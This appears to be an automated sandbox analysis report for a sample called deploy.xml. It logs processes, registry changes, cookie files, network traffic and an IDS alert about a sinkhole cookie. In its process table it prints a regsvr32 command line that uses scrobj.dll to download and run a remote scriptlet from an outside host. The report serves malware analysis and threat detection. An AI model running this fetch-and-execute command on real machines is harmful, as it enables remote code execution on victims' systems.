| download: | deploy.xml |
| Full analysis: | https://app.any.run/tasks/35577e30-5afe-4d8a-a945-5091d616b6fd |
| Verdict: | Malicious activity |
| Analysis date: | September 05, 2023, 03:07:26 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | inode/x-empty |
| File info: | empty |
| MD5: | D41D8CD98F00B204E9800998ECF8427E |
| SHA1: | DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 |
| SHA256: | E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 |
| SSDEEP: | 3:: |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1184 | regsvr32.exe /s /n /u /i:http://server1.39slxu3bw.ru/deploy.xml scrobj.dll | C:\Windows\System32\regsvr32.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 5 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1600 | "C:\Windows\system32\cmd.exe" | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3516 | "C:\Windows\System32\regsvr32.exe" /s /n /u /i:http://server1.39slxu3bw.ru/deploy.xml scrobj.dll | C:\Windows\System32\regsvr32.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 5 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 460000004F010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCC67766-6201-4AD1-A6B8-2F4553C93D47} |
| Operation: | write | Name: | WpadDecisionReason |
Value: 1 | |||
| (PID) Process: | (3516) regsvr32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FCC67766-6201-4AD1-A6B8-2F4553C93D47} |
| Operation: | write | Name: | WpadDecisionTime |
Value: D2DB4820A6DFD901 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1184 | regsvr32.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\TTWMBLJ1.txt | text | |
MD5:99C1F8166EA0F1167ACE125EA90F0C5B | SHA256:09322EF810D27D8254A0B4C9B4FC3C0C955E9005722ECC016CF9455CCFE018F3 | |||
| 3516 | regsvr32.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\HWRHT8P3.txt | text | |
MD5:B31509FAA24B538C1CB4B5BC851A2DA2 | SHA256:F581161D2DECB2028132D5E4A10CF424132637FA8B11D6026739CC2A4ABD8752 | |||
| 3516 | regsvr32.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\DY46KHMU.txt | text | |
MD5:6A7A89EB0B93D64948E20507327FABEB | SHA256:5B9066B07820E1DE79C6C0B4C841111041C49E9B9E63A0E5BED5382058340730 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3516 | regsvr32.exe | GET | 200 | 63.251.106.25:80 | http://server1.39slxu3bw.ru/deploy.xml | US | binary | 20 b | unknown |
1184 | regsvr32.exe | GET | 200 | 63.251.106.25:80 | http://server1.39slxu3bw.ru/deploy.xml | US | binary | 20 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3516 | regsvr32.exe | 63.251.106.25:80 | — | VOXEL-DOT-NET | US | malicious |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1184 | regsvr32.exe | 63.251.106.25:80 | — | VOXEL-DOT-NET | US | malicious |
PID | Process | Class | Message |
|---|---|---|---|
3516 | regsvr32.exe | A Network Trojan was detected | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz |